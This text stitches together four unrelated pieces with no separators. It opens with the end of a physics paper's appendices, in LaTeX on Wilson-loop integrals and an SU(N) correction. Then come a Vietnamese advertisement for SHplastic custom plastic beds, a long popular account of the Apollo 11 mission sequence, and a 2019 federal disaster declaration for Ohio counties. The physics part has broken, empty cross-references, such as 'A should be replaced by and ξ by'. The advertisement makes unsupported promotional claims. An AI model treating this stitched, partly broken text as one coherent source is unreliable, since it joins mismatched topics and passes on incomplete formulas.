_{j=1}^{N-1} \frac{1}{a_N-a_j}-\frac{f}{N} - \frac{1}{N^2} \sum_{j=1}^{N-1} \frac{1}{e^{a_N-a_j}-1} \\ \frac{\partial ^2S}{\partial a_k^2} & = & \frac{4}{\lambda N} + \frac{2}{N^2}\, \sum _{j\neq k}^{N} \frac{1}{\left(a_k-a_j\right){}^2} +\frac{1}{N^2}\, \frac{e^{a_N-a_k}}{(e^{a_N-a_k}-1)^2} , \quad k \neq N\\ \frac{\partial ^2S}{\partial a_N^2} & = & \frac{4}{\lambda N} + \frac{2}{N^2}\, \sum _{j=1}^{N-1} \frac{1}{\left(a_k-a_j\right){}^2} +\frac{1}{N^2}\,\sum _{j=1}^{N-1} \frac{e^{a_N-a_j}}{(e^{a_N-a_j}-1)^2}\\ \frac{\partial ^2S}{\partial a_l \partial a_k} & = & -\frac{2}{N^2 \left(a_k-a_l\right)^2} , \quad l\neq k \neq N \\ \frac{\partial ^2S}{\partial a_N \partial a_k} & = & -\frac{2}{N^2 \left(a_k-a_N\right)^2}-\frac{1}{N^2}\, \frac{e^{a_N-a_k}}{(e^{a_N-a_k}-1)^2}\end{aligned}$$ Continuous ---------- $$\begin{aligned} S_0[\rho] & = & \frac{2}{\lambda } \int_{-c}^c dy \, \rho (y) y^2 - \strokedint_{-c}^{c} dy\, \rho(y) \int_{-c}^{c} dz\, \rho(z) \text{Re}\left[\log(z-y)\right]\label{S0}\\ S_1[\rho] & = & \frac{2}{\lambda } A^2 - f \, A - 2 \int_{-c}^{c} dy\, \rho(y) \log(A-y)+ \int_{-c}^c dy \, \rho(y) \log(1-e^{y-A})\label{S1}\\ \frac{S_0[\rho]}{\delta \rho (x)} & = & \frac{2 }{\lambda} x^2 - \strokedint_{-c}^{c} dy\, \rho(y) \log((y-x)^2) \\ \frac{\delta S_1[\rho]}{\delta \rho (x)} & = & -2 \log (A-x) + \log(1-e^{x-A}) \\ \frac{\delta ^2 S_0[\rho]}{\delta \rho (x) \delta \rho (y)} & = & \begin{cases} -\log\left((y-x)^2 \right) &\mbox{if} \; x\neq y\\ 0 &\mbox{if} \; x = y \end{cases}\end{aligned}$$ Integrals {#sec:integrals} ========= The integrals below are used to compute the on-shell action. They are valid for $A>c>0$ and $c>x>-c$, except for the one with $\rho_0$, which is also valid when $A = c$. The explicit expressions for the densities can be found in the appendix \[sec:solutionRho\]. $$\begin{aligned} \int_{-c}^{c} dy\, \rho_0(y) \log (A-y) & = & -\frac{1}{2} -\frac{A \left(\sqrt{A^2-c^2}-A\right) }{c^2} +\log \left(\frac{\sqrt{A^2-c^2}+A}{2} \right) \label{i1}\\ \int_{-c}^{c} dy\, \rho_1(y) \log (A-y) & = & \frac{1}{2} \log \left(\frac{2 A \left(\sqrt{A^2-c^2}+A\right)-c^2}{4 \left(A^2-c^2\right)^2}\right)\label{i2}\\ \strokedint_{-c}^{c} dy\, \rho _1(y) \text{Re}\left[\log (y-x)\right] & = & -\log (A-x) -\log \left(\frac{\sqrt{A+c}-\sqrt{A-c}}{\sqrt{A-c}+\sqrt{A+c}}\right) \label{i3} \\ \int_{-c}^{c} dy\, \rho_{1,\xi}(y) \log (A-y) & = & (A-\sqrt{A^2-c^2}) \, \xi \label{i4} $$ Exponentially-small corrections in N {#sec:proofWrest} ==================================== Let us write the character as $$\chi_k = \chi_{k,1} + \chi_{k,\text{rest}},$$ where $$\begin{aligned} \chi_{k,1} & = & e^{k a_N} \prod_{j=1}^{N-1} \dfrac{1}{1-e^{a_j-a_N}} \\ & \approx & e^{N \left(f A - \int_{-c}^c dy \rho (y) \log\left(1-e^{y-A}\right) \right) } \end{aligned}$$ and $$\begin{aligned} \chi_{k,\text{rest}} & = & \sum_{i = 1}^{N-1} e^{k a_i} \prod_{j \neq i}^{N} \dfrac{1}{1-e^{a_j-a_i}} \\ & \approx & N \int_{-c}^c \rho (x) \, e^{N \left( f x - \strokedint_{-c}^c \rho (x) \log\left(1-e^{y-x} \right) -\log \left(1-e^{A-x}\right) \right)}. \end{aligned}$$ We used the equilibrium distribution and for the approximations above. Thus, the Wilson loop, i.e. the expectation value of the character, can be written as $$\begin{aligned} W & = & W_1 + W_\text{rest}\\ & = & W_1 \left(1 + N \int_{-c}^c \rho (x) e^{-N \Gamma (x)} \, dx \right), \end{aligned}$$ where $$\Gamma (x)\equiv f (A-x) + \strokedint_{-c}^c \rho (y) \log \left(\frac{1-e^{y-x}}{1-e^{y-A}}\right) \, dy + \log \left(1-e^{A-x}\right).$$ If $\Gamma(x) > 0 $, then at large $N$, the integral must be much smaller than 1: $$\begin{aligned} \log W - \log W_1 & = & \log\left(1 + N \int_{-c}^c \rho (x) e^{-N \Gamma (x)} \, dx \right)\\ & \approx & N \int_{-c}^c \rho (x) e^{-N \Gamma (x)} \, dx\\ & \approx & e^{-N \,\Gamma_\text{eff}(x_*)},\end{aligned}$$ where in the last step, the saddle-point approximation is used. We check numerically that $\Gamma(x) > 0 $ for all $x$ in the interval $[-c,c]$ when $c$ is large enough, see the plots in fig. \[fig:gammaPositivePlots\]. Since we are in the strong-coupling regime, the correction from $ \chi_{k,\text{rest}}$ is certainly exponentially suppressed for large $N$. SU(N) correction {#sec:SUN} ================ The body of this paper has focused on the $U(N)$ gauge group. Nevertheless, usual holography is referred to $SU(N)$, though there are arguments [@Marino:2001re] favoring $U(N)$. Since our computation is quite straightforward, let us compute explicitly the correction of $SU(N)$ to the subleading order in large $N$. All we need to do it is to add a Lagrange multiplier term to the action $$S_\xi = \frac{2 \, \xi }{N^2} \sum_{i=1}^N a_i,$$ in order to enforce the traceless constraint: $$\frac{d S_\xi}{d \xi} =0 \quad \Rightarrow \quad \sum_{i=1}^N a_i = 0.$$ The saddle-point equations also get modified, by adding $\frac{\partial S_\xi}{\partial a_i}=\frac{2\, \xi}{ N^2}$ to the derivatives in \[sec:action\]. Hence, the $SU(N)$ correction to the Wilson loop enters only through the density, see \[sec:solutionRho\]. The contribution to the log of the Wilson loop is exactly the integral , where $A$ should be replaced by and $\xi$ by , and we end up with the free energy $$\mathcal{F}_{1,\, \xi} = - 2 \kappa (\sqrt{1+\kappa^2}-\kappa).$$ We see that this addition to our $U(N)$ result does not match either with the holographic solution . [^1]: The compactification on $S^4$ does not really matter in this context because of the conformal invariance of $\mathcal{N} = 4$ SYM. [^2]: In the appendix \[sec:proofWrest\], we comment on the contribution from the rest of the sum in . [^3]: For convenience, we put a list of the action and its derivatives in the appendix \[sec:action\]. For $S_0$ written here, we used the identity: $$\sum_{i}^{N-1} \sum_{j=i+1}^{N-1} \log(a_j-a_i) = \frac{1}{2} \sum_{i}^{N-1} \sum_{j\neq i}^{N-1} \text{Re}\left[ \log(a_j-a_i)\right].$$ [^4]: It is not necessarily to expand $A = A_0+A_1/N$ for our purposes (see footnote \[fn:deltaA\]). It is straightforward to solve it though, for : $$\strokedint_{-c}^c dy \, \frac{\rho_1 (y)}{A_0-y} = \frac{2}{\lambda} A_1 \quad \Rightarrow \quad A_1 = -\frac{A_0 \, c^2}{2 (A_0^2-c^2)}$$ [^5]: Note that we neglected the expansion from the Bose term, since it is exponentially-suppressed. [^6]: \[fn:deltaA\] The same formula applies to the $1/N$ correction to $A$, and we see clearly that it does not contribute to the next-to-leading order term in large $N$, due to it being quadratic. [^7]: The series expansion for the modified Bessel function used here is taken from: <http://functions.wolfram.com/Bessel-TypeFunctions/BesselI/06/02/03/01/> [^8]: This means we are using the character formula . [^9]: The reader can check that this is indeed the solution by using the Poincaré-Bertrand transposition formula: $$\strokedint_a^b \dfrac{1}{x-y} \left[ \strokedint_a^b \dfrac{f(x,t)}{t-x} \, dt \right]\, dx = -\pi^2 f(y,y) + \strokedint_a^b \left[ \strokedint_a^b \dfrac{f(x,t)}{(x-y)(t-x)} \, dx \right]\, dt.$$
Có nên đóng giường ngủ nhựa thiết kế theo yêu cầu? Lựa chọn giường ngủ ngoài kiểu dáng thì kích thước cũng vô cùng quan trọng. Nhiều người lựa chọn kích thước giường theo kích thước đệm sẵn có nhưng có người lại quan tâm đến bài trí giường ngủ sao cho phù hợp với kích thước không gian phòng ngủ. Hiện nay có rất nhiều đồ nội thất nói chung và giường ngủ nói riêng được đóng sẵn, khách hàng chỉ cần lựa chọn mẫu mã và đem về lắp ráp, rất nhanh chóng không mất nhiều thời gian chờ đợi như đồ nội thất đo đạc thiết kế. Tuy nhiên, nhược điểm của lựa chọn đồ nội thất kiểu này khó đồng bộ và không lựa chọn được kích thước mình mong muốn. Đóng giường ngủ nhựa thiết kế theo yêu cầu hay lựa chọn giường ngủ đóng sẵn. SHplastic có thể hỗ trợ bạn cả 2, nhưng giải pháp nào bạn nên lựa chọn? ♮ Dễ dàng đồng bộ màu sắc cho toàn bộ phòng ngủ Giường ngủ là một trong những đồ dùng vô cùng quan trọng tuy nhiên nó cũng mang tính trang trí và thẩm mỹ cho cả phòng ngủ. Việc đo đạc thiết kế giường ngủ nói chung hay giường nhựa đồng bộ với tủ quần áo nhựa, bàn trang điểm, bàn làm việc được coi là lựa chọn thông minh. Bạn có thể thoải mái lựa chọn màu sắc mong muốn theo bảng màu có sẵn sao cho phù hợp với các đồ nội thất khác trong phòng. ✍ SHplastic có gợi ý cho bạn đây: Vân Gỗ Sồi – Màu Nội Thất Nhựa Được Ưa Thích Nhất 2019 Dễ dàng thiết kế đồng bộ nội thất trong phòng ngủ Bảng màu nhựa SHplastic đa dạng cho bạn lựa chọn khi thiết kế giường ♮ Được tư vấn, thiết kế miễn phí Tùy theo nhu cầu sử dụng mà giường ngủ nhựa được thiết kế theo nhiều mẫu mã khác nhau. Tại SHplastic, khách hàng sẽ được tư vấn kiểu dáng sao cho phù hợp với địa hình và nhu cầu sử dụng. ☑ Bạn có biết chúng tôi đang: Nhận đóng, lắp đặt, thiết kế, làm tủ bếp, tủ nhựa Đài Loan theo yêu cầu Giường nhựa Đài Loan ngăn kéo 2 bên tiện dụng Giường ngủ nhựa SHplastic luôn khuyên quý khách hàng nên tận dụng các ngăn kéo nhỏ bên hông giường làm không gian chứa đồ vô cùng tiện lợi mà lại gọn gàng. Giường ngủ nhựa liền kệ trang trí tiện dụng Với không gian phòng ngủ không mấy rộng rãi, bạn có thể lựa chọn kiểu giường có kệ đầu giường, vừa có tác dụng trang trí cho phòng ngủ, vừa cất trữ được nhiều đồ đạc hơn như tranh ảnh, sách truyện, hoặc các vật dụng trang trí khác. ☻Đừng bỏ lỡ bài viết này ☞ Bí Quyết Chọn Giường Ngủ Nhựa Đẹp Cho Phòng Ngủ ♮ Vận chuyển, lắp đặt miễn phí tận nhà Với đội ngũ nhân viên lắp đặt giàu kinh nghiệm, giường ngủ bằng nhựa sẽ được vận chuyển và lắp đặt, điều chỉnh tại nhà cho khách hàng và giải đáp các thắc mắc của khách hàng trong quá trình sử dụng. ♮ Chế độ bảo hành 10 năm độc quyền Nếu giường ngủ đóng sẵn chỉ được bảo hành vài tháng cho đến 1 năm thì giường ngủ nhựa Đài Loan tại SHplastic lại được bảo hành lên đến 10 năm, hỗ trợ tháo lắp, vận chuyển, di dời nếu bạn có chuyển nhà trong quá trình sử dụng. Để mua được những sản phẩm giường nhựa Đài Loan chính hãng hãy tìm mua sản phẩm có xuất xứ rõ ràng. Sản phẩm nội thất nhựa của SHplastic hiện nay là sản phẩm duy nhất có giấy chứng nhận an toàn.  Hiện tại tất cả sản phẩm nội thất nhựa đều được sản xuất tại xưởng của SHplastic để đảm bảo chất lượng tuyệt đối nhất cho khách hàng. Gọi ngay: ☏ 1900.63.33.01
The Apollo 11 Mission Sequence Preparation started weeks before launch, but the final count down started 13 hours before lift off. The propellant and oxidiser tanks were filled and the crew ran through the mission checklist.The first stage ignition sequence started 8.9 seconds before the launch. During the final stages of count down, the crew were sitting on 2500 tons of propellant with a potential explosive yield of just over half a kiloton of TNT, equivalent to a small nuclear bomb*, waiting for ignition and blast off into the unknown in a complex space vehicle constructed from 7 million components which had to perform flawlessly to get them back home safely. Perhaps the Apollo crew reflected on the comments of John Glenn, America's first astronaut to orbit the Earth, about his thoughts as he waited in his Mercury capsule for blast off into space. He reportedly said "I look around at all the complex equipment and think that every piece was bought from the lowest cost vendor". The five F-1 kerosene fuelled rocket engines of the Saturn V launch vehicle, each with a thrust of over 1.5 million pounds, fired 0.3 seconds apart to lessen resonance effects in the fuel system which could cause "pogo stick" like vibrations on the rocket's structure and systems as well as on the astronauts, and Apollo 11 slowly rose from the launch pad taking 11 seconds to clear the launch tower. S-1C (First Stage) S-1C powered flight with a thrust of 7.6 million pounds from the five F-1 engines gulping 13 tons of kerosene (RP-1) and liquid oxygen (LOX) per second, pinning the astronauts into their seats with a "g" force of 4.5 g. Pitch and Roll Two miles off the launch pad and travelling at 1500 mph, Saturn's guidance computer set Apollo 11 on the planned trajectory with directional adjustments being made by means of hydraulic actuators on the gimbal mounts of the four outer F-1 engines. Loss of control during the critical launch phase would have resulted in the destruction of the rocket. Such an event would however have triggered the Launch Escape System to eject the crew capsule and deploy its parachutes to bring the crew safely back to the ground. Mission Control Center (MCC) in Houston tracked the spacecraft throughout its mission, except when it was behind the Moon during which time communications were not possible. The timings and duration of the engine burns at key points were controlled by Houston Mission Control and were programmed into the Guidance Computers in the Instrument Unit, the Command Module and the Lunar Module. S-1C (First Stage) / S-11 (Second Stage) Separation After 2.5 minutes the 4.5 million pounds (over 2,000 tons) of propellant in S-1C were used up and the S-IC's eight retro rockets were fired to separate it from the S-11. The S-1C was jettisoned and fell into the Atlantic Ocean. By that time, Saturn V had reached an altitude of 45 miles, 350 miles downrange and was travelling at 6,300 m.p.h. Four seconds later the five J-2 hydrogen fuelled engines of the S-11 started up. S-II (Second Stage) S-11 powered flight with a total thrust of 1.125 million pounds from the five J-2 engines. Launch Escape Tower Jettison Once the second stage was safely on its way, at a height of 60 miles, the Launch Escape Tower was jettisoned. S-11 (Second Stage) / S-1VB (Third Stage) Separation After 6.5 minutes the 942,000 pounds (over 400 tons) of propellant in Stage 2 were exhausted. The S-1VB Stage 3 took over and the S-11 was jettisoned. By that time Saturn V had reached an altitude of 110 miles, 1,400 miles down range travelling at 15,000 m.p.h. S-1VB (Third Stage) S-1VB powered flight with a single J-2 re-startable engine with a thrust of 225,000 pounds. Earth Parking Orbit The J-2 engine burned for 2.75 minutes to put the Saturn V into a circular parking orbit 1,640 miles downrange at an altitude of 118.8 miles (191.2 km) with an orbital velocity of 17,432 mph and an orbital period of 1 hour, 28 minutes, 16 seconds. The third stage remained attached to the Apollo 11 spacecraft while it orbited the Earth one and a half times during which time the astronauts and mission controllers checked that all systems were functioning correctly and positioned the rocket precisely for initiating translunar injection. Trans Lunar Injection - Accelerating to the Escape Velocity After one and a half Earth orbits, 2 hours and 44 minutes after launch, the Saturn's third-stage J-2 engine was re-started to produce a second burn lasting 5.2 minutes which accelerated the Apollo 11 to an altitude of 190 miles with a velocity of 24,500 mph (10.9 kms/sec) to escape from its Earth parking orbit and enter into a "free return trajectory" to the Moon. This meant that when the spacecraft eventually passed by the Moon its velocity, direction and radial distance from the Moon would be such that the Moon's gravity would deflect it into a "slingshot" path around the Moon and back in the direction it came from towards the Earth. Too close or too slow would cause the spacecraft to crash into the Moon. Too far away or too fast would send the spacecraft on a one way journey into space. Public domain - Modified To complicate the manoeuvre even further, the Moon is a moving target travelling at 2286 m.p.h. orbiting the earth in 27 days so that the direction of the spacecraft as it left its Earth orbit was not to where the Moon was at the instant of departure, but to where it would be in three day's time when the spacecraft actually reached it. This required very precise control over the point and timing at which the spacecraft left the Earth orbit and the duration of the engine burn. Note that the velocity necessary to overcome from the Earth's gravitational pull depends on the spacecraft's orbital altitude. At the Earth's surface, the escape velocity is slightly higher at 25,000 mph (11.2 kms/sec). (See Entering Space). Initial Translunar Coast Apollo 11 began its three-day, 240,000 mile un-powered flight through the vacuum of space during which the spacecraft's momentum alone kept it moving towards the Moon. Service Module Orientation, Docking and Extraction During its transit through the atmosphere the flimsy Lunar Module (LM) sat on top of the Saturn V third stage inside the LM Adapter which protected it from damage caused by aerodynamic pressures and friction. Then during the first 10 minutes of the translunar coast, when Apollo11 was above the Earth's atmosphere, the attitude of the spacecraft was adjusted in readiness for extracting the Lunar Module from the LM Adapter and coupling it to the Command and Service Module (CSM). The next three steps were the Lunar Module Transposition and Docking Public domain (Modified) Lunar Module Transposition and Docking Step 1 - CSM separation from the LM Adapter The panels of the LM Adapter were jettisoned and the reaction control thrusters of the CSM mother ship were fired to separate it from the Saturn S-1VB third stage, leaving the Lunar Module behind and stopping 50 to 75 feet away. Step 2 - CSM docking with LM / S-IVB (Third Stage) The CSM thrusters then rotated the CSM by 180 degrees and docked it with the Lunar Module which was still attached to the third stage. All this happened with the Saturn S-1VB and the CSM hurtling separately through space at over 24,000 miles per hour. Step 3 - CSM /LM separation from S-IVB The LM now attached to the CSM was extracted from the LM Adapter and the third stage S-IVB, together with its attached Instrument Unit was jettisoned, and went into orbit around the Sun. After 4 hours and 40 minutes into the flight, the LM now docked with the CSM mother ship was ready for its journey to the moon. The CSM and LM continued their three day journey to the Moon tracked by mission control in Houston. Travelling through the vacuum of space, the flimsy Lunar Module no longer needed the protection of the LM Adapter. During this phase of the journey the spacecraft was put into a slow roll of two revolutions per hour to provide uniform solar heating, however this was stopped during navigation sightings and course corrections. Still influenced by the Earth's gravitational pull, the spacecraft gradually slowed down to about 2040 mph at 39,000 miles from the Moon but as the Earth's gravitational effect continued to weaken, the Moon's gravity began to dominate and the spacecraft speeded up again to about 5600 mph until it was eventually pulled into a "slingshot" trajectory around the back of the Moon. Mid-Course Correction Mid-course corrections to ensure that the spacecraft did not stray from its "free return trajectory" were implemented by either, or both, the Service Module's reaction control thrusters or by its main propulsion engine. Besides the mid-course correction, during the flight, the crew periodically checked their position with respect to the stars using a sextant and this celestial reference was used to correct for any drift of the gyroscopes in the inertial navigation system. Loss of Signal Although the Apollo 11 had autonomous navigation and control systems, it still needed constant communications with Mission Control in Houston since it did not have sufficient computing power at all times to monitor the spacecraft's speed and position in space and to program the timing and duration of the main engine and control thruster burns to make any course corrections necessary to initiate lunar orbit insertion or to get the spacecraft back to Earth in an emergency. But communications. between the Earth and the spacecraft need a "line of sight" link between the transmitters and the receivers and this raised potential problems at both ends of the link. While in lunar orbit, the Apollo 11 spent 45 minutes behind the Moon during each two hour orbit, and while it was behind the Moon, communications with the Earth were not possible. At the other end of the link the Earth is rotating and part of the time the Mission Control Center in Houston was facing away from the Moon and unable to "see" the spacecraft. To address the first problem the spacecraft received targeting information from Houston before each loss of signal as it passed behind the Moon. If acquisition of the signal failed when it emerged from behind the Moon, the landing would be abandoned and the crew would use that information to target a contingency burn home. To maintain communications with the spacecraft as the Earth rotated, at least three satellite ground stations separated by approximately 120 degrees of longitude and connected by a terrestrial network to Mission Control were required so that as the Earth turned the spacecraft was always above the horizon of at least one station so that there was no loss of signal due to the Earth's rotation.. Lunar Orbit Insertion To breakout from its slingshot track around the Moon and enter into lunar orbit, a retro-thrust was required to slow the spacecraft down from its velocity of around 5,600 mph, with respect to the Moon's velocity, to 3,600 mph allowing it to be captured by the Moon's gravity. Due to the ballistics of the slingshot trajectory around the Moon, this manoeuvre had to take place while the spacecraft was behind the Moon and out of communication with the Earth. Thus after loss of signal, as Apollo 11 passed behind the Moon, the Service Module fired its main propulsion engine in two burns in the direction of travel to slow its momentum and enter lunar orbit. The first burn lasted 6 minutes and placed the craft in an initial elliptical lunar orbit of 196 by 69 miles. The second burn lasted just 17 seconds and eased Apollo 11 into a circular orbit of 69 miles, in preparation for Lunar Module separation and powered descent. Using two shorter burns reduced the chance of over-burn, which would slow the spacecraft too much causing it to crash into the lunar surface. Lunar Orbit The CSM docked with the LM, travelling at 3,600 mph at an altitude of 69 miles, continued orbiting the Moon once every two hours during which time it was out of communication with the Earth for 45 minutes. During 13 orbits the crew checked that all systems were functioning correctly, made observations of their planned landing site in The Sea of Tranquility and also spent some time resting. Crew Transfer to LM The LM pilots, Neil Armstrong and Buzz Aldrin transfered from the Command Module to the crew compartment in the Ascent Stage of the LM and checked that all systems were performing correctly. Lunar Module Separation Using its reaction control thrusters the LM was undocked from CSM to prepare for descent while Michael Collins in the Command Module made a visual check that the LM legs of the landing gear had opened from their stowed position and were latched in place. LM Descent Because the Moon has no atmosphere it was not possible to use parachutes to make a soft landing nor wings to glide down to the surface. A rocket powered descent to the lunar surface was therfore needed. Balancing a rocket on its exhaust jet and preventing it from toppling over while simultaneously reducing its thrust to make a gentle, upright landing is no mean feat. The LM's Digital AutoPilot (DAP) and gimbals kept the direction of the rocket's thrust in line with the centre of mass of the LM to ensure stability during the descent. The descent to, and ascent from, the Moon were both controlled from the LM crew compartment in the Ascent Stage which contained the necessary status displays and control systems. A single set of 16 reaction control thrusters, identical to those used on the Service Module, to control both the descent and ascent was also mounted on the Ascent Stage of the LM. However the LM Ascent and Descent stages each had their own main engines, the descent engine with a thrust of 10,125 pounds being much larger since it had to support a much greater weight, and the ascent engine with a thrust of 3,600 pounds. In a series of pre-programmed, controlled burns by the descent engine to slow the Lunar Module, the LM was first put into an elliptical orbit of 70 miles by 9.5 miles (50,000 feet), high enough to clear the Moon's mountains, and to bring it over the planned landing point at its pericynthion (the orbit's nearest point to the Moon), then a further braking burn took the LM down to 9000 feet and oriented so that the crew could see and begin to evaluate the suitability of the landing zone. A further pre-programmed burn then took the LM down to 500 feet at which point the crew had to take over manual control of the descent. Final Landing Phase - Touchdown - 20 July 1969 at the Moon's Sea of Tranquility Before landing, the crew were unaware of the precise nature of the Moon's surface and whether they would sink into a deep layer of dust. Depending on the nature of the terrain below, the pilot had to guide the LM away from any observed hazards such as boulders, craters, fissures and rock outcrops. Real time feedback control from Mission Control of the final landing manoeuvres was not possible, even if it was desirable, because the two-way delay of a radio signals, travelling at the speed of light, carrying sensing inputs to Houston and responses back to the Moon was too long at 2.6 seconds and would have resulted in instability and loss of control. (To this delay would have to be added the further delays introduced by the terrestrial signal networks). At 500 feet the LM pilot Neil Armstrong took control of the descent making any adjustments necessary. Finally, at 65 feet above the lunar surface, the LM was re-oriented and descended vertically to the Moon at 3 feet per second and the engine was shut off as soon as the landing gear touched the surface. Dramas at the End of the Line Descending to the surface, Apollo 11's Lunar module was about 6,000 feet above the surface and the descent engine was halfway through its final 12-minute burn that would land the crew safely on the moon, when a yellow caution light lit up on the computer control panel. It was coded 1202, an "executive overflow" alarm, which meant the computer was having trouble completing its work in the cycling time available, and the astronauts asked Mission Control for instructions. As NASA legend has it, 26 year old Steve Bales, the guidance officer (GUIDO) who had the authority to issue a Go or No Go decision on the landing - continued to issue a confident "We're Go!" throughout the remaining seconds of the descent, even as the 1202 and a similar alarm, the 1201, sounded intermittently. When the lunar module made its landing, it had seconds of fuel remaining before it would have to abort. The icy calm of Bales is a dramatic, iconic moment in NASA history, but as you peel back the layers of preparation that led to those moments, the story becomes almost astounding. Bales – who later accepted the NASA Group Achievement Award from President Nixon on behalf of the entire mission operations team – credited his quick decision to an even younger whiz kid, John R. "Jack" Garman, 24 years old, an expert in the guidance computer software. It was Garman who, a few months before Apollo 11, gave the simulation supervisor, Dick Koos, the idea of testing the reaction of flight controllers to computer error codes. He also supported flight controllers in Mission Control as a backroom advisor on computer systems. By the time the actual landing was being attempted by astronauts Neil Armstrong and Buzz Aldrin, Garman knew almost instinctively that a single 1202 or 1201 alarm did not mean the mission had to be aborted; it simply meant the computer was struggling to keep up. As long as the alarm did not become continuous, which would have meant that the computer was not getting any work done and vital tasks were being neglected, it would not prevent a landing. And it was Garman supporting Bales from another console to whom Bales turned when the 1202 alarm went off. “Quite frankly,” Bales later recalled, “Jack, who had these things memorized, said, ‘That’s okay,’ before I could even remember which group [the alarm] was in.” For his part, Garman gives credit for his memorisation of the alarm codes to Gene Kranz, the fiery Flight Director who brought the Apollo 13 astronauts back to Earth after the explosion in their spacecraft. “[Before the mission] Gene Kranz, who was the real hero of that whole episode, said, ‘No, no, no. I want you all to write down every possible computer alarm that can possibly go wrong.’” Garman did so, along with the correct reaction to those alarms – and kept this handwritten list under glass on his desk. Searching for landing space in boulder field Apollo 11 Lunar Module touched down with only enough fuel and oxidiser in its tanks for a further 25 seconds of flight. Exploration of Lunar Surface Inside the controlled environment of the Lunar Module Armstrong and Aldrin changed from their pressurised flight suits into space suits with self-contained life support systems before depressurising the cabin and stepping down into the vacuum of space. Alighting from the LM they remained for two and a half hours of Extra Vehicular Activity (EVA) on the Moon during which they collected 22 Kg of samples of lunar rocks and soil as well as samples of the solar wind (charged particles emitted by the Sun) to bring back to Earth. They also took photographs and set up experiments to investigate soil mechanics and lunar seismic activity and they deployed a laser ranging retro-reflector to enable precise measurements of the distance between the Earth and the Moon. LM Ascent Liftoff After 21.5 hours parked on the lunar surface, the crew fired up the LM Ascent Stage to return to the CSM mother ship leaving the Descent Stage on the Moon. The Lunar Module Ascent Stage didn’t need to accelerate to the Moon's escape velocity of 5,300 mph to leave the Moon. it only had to reach a lunar orbit with a velocity of 3,600 mph to rendezvous and dock with the CSM mother ship. The CSM provided the thrust to escape from the Moon's gravity. The main engine of the ascent stage took the LM up to over 11 miles and put it into an elliptical orbit. There was no contingency plan if the Ascent Stage failed to get off the ground. Rendezvous and Docking To rendezvous with the CSM, the LM executed a series of burns by its reaction control thrusters, controlled by the LM computer on the basis of data supplied by Houston Mission Control, that initially put it into a circular orbit at an altitude of 69 miles concentric with the CSM, and then slowed it down to dock with the CSM. The LM commander took over control for the final docking manoeuvre. Return docking was very critical and difficult. Transfer of Crew and Equipment from LM to CSM The crew returned to the Command Module and the hatch was sealed. CSM / LM Separation and Lunar Module Jettison The LM was detached from CSM which fired its reaction control thrusters to ensure complete separation. The LM Ascent Stage was left in lunar orbit. Trans Earth-Injection The CSM main engine fired for 2.5 minutes to increase its velocity from 3,600 mph to 5,500, just over the Moon's escape velocity, to break out of lunar orbit and send the Apollo 11 on a trajectory back to Earth. Like the Lunar Orbit Insertion, this manoeuvre took place when the CSM was behind the Moon and out of communication with Mission Control. Trans-Earth Coast Apollo 11's return voyage to Earth powered by the Earth's gravity. The gravitational effects of the Trans Lunar Coast were reversed. The velocity of the CSM initially slowed due to the gravitational pull from the Moon, but as the spacecraft moved away from the Moon, the Moon's gravitational effect diminished while and the Earth's gravitational pull increased. Once the Earth's gravitation became dominant the spacecraft was accelerated in a free fall all the way to the Earth reaching a velocity of 25,000 m.p.h. as it entered the Earth's atmosphere over three days later. Mid Course Correction Similar to the outward journey, the velocity and angle of approach to the Earth had to be very precisely controlled to ensure capture by the Earth's gravity and splashdown in the designated area. Command Module / Service Module Separation Shortly before entering the Earth's atmosphere at an altitude of 400,000 feet (around 75 miles) the Service Module was jettisoned by simultaneous firing of the reaction control thrusters in both the Service Module and the Command Module. The Command module was then rotated by 180 degrees to turn its blunt end towards the Earth. Re-entry Landing is just as dangerous as taking off and the precise re-entry trajectory is critical to making a safe landing. Once initiated there is no possibility of a second chance by "going around" and trying again if things go wrong. The initial drag of 0.05 g experienced as the capsule entered the atmosphere triggered the Earth Landing Subsystem (ELS) which controlled the re-entry process. The Command Module entered the atmosphere, blunt end first, at 400,000 feet with a velocity approaching 25,000 mph at an angle of 6.488 degrees to the horizontal and flew about 1240 miles around the Earth to its designated landing point in the Pacific Ocean. The velocity of entry and the angle of the flight-path had to be very closely controlled to achieve this. At the very high entry velocity the compression of the air in front of the capsule heated its surface up to around 2760 °C (5000 °F), hot enough to vaporise most metals, turning the capsule into a shooting star. A 2.5 inch thick, sacrificial ablative heat shield which burns and erodes in a controlled way, carrying the heat away with its combustion products, protected the capsule from the heat of re-entry. The only braking from the high re-entry velocity, down to the velocity at which parachutes could be deployed was by the drag of the atmosphere on the blunt shaped capsule. The reason for the 1240 mile trip half way around the world was mainly to provide adequate braking distance for the capsule, but also time for it to cool, by directing it along a sloping path through the atmosphere. Entering the atmosphere at too high an angle would either incinerate the crew or subject them to crushing g forces. In any case, in a normal landing the astronauts were typically subject to 6g. On the other hand, entering the atmosphere at too low an angle would not provide sufficient braking and the un-powered capsule would fly off into space with no possibility of return. Communications Blackout Period At the start of re-entry, the extreme heat of the shockwave generated by the compression of the air in front of the Command Module ionised the air creating a plasma which effectively blocked the transmission of radio signals to and from the spacecraft for about three minutes as it entered the atmosphere Splashdown 24 July 1969 By the time the capsule had descended to 24,000 feet, it had slowed to around 325 mph and a barometric switch initiated the jettisoning of the forward heat shield and the deployment of drogue parachutes which stabilised the craft, slowing its descent even further. At 10,700 feet and travelling at 175 m.p.h. the three main parachutes were deployed reducing the Command Module's decent velocity to 22 mph for splashdown in the Pacific Ocean, just 15 miles from where the US Navy recovery ship Hornet was waiting for it. Quarantine The astronauts spent 21 days in quarantine as a precaution against the possibility of bringing back unknown pathogens from the lunar surface.
Today, President Donald J. Trump declared that a major disaster exists in the State of Ohio and ordered Federal assistance to supplement State and local recovery efforts in the areas affected by severe storms, flooding, and landslides from February 5 to February 13, 2019. Federal funding is available to State and eligible local governments and certain private nonprofit organizations on a cost-sharing basis for emergency work and the repair or replacement of facilities damaged by the severe storms, flooding, and landslides in the counties of Adams, Athens, Brown, Gallia, Guernsey, Hocking, Jackson, Jefferson, Lawrence, Meigs, Monroe, Morgan, Muskingum, Noble, Perry, Pike, Ross, Scioto, Vinton, and Washington. Federal funding is also available on a cost-sharing basis for hazard mitigation measures statewide. Pete Gaynor, Acting Administrator, Federal Emergency Management Agency (FEMA), Department of Homeland Security, named Steven W. Johnson as the Federal Coordinating Officer for Federal recovery operations in the affected areas. Additional designations may be made at a later date if requested by the State and warranted by the results of further damage assessments. FOR FURTHER INFORMATION MEDIA SHOULD CONTACT THE FEMA NEWS DESK AT (202) 646-3272 OR FEMA-NEWS-DESK@FEMA.DHS.GOV.
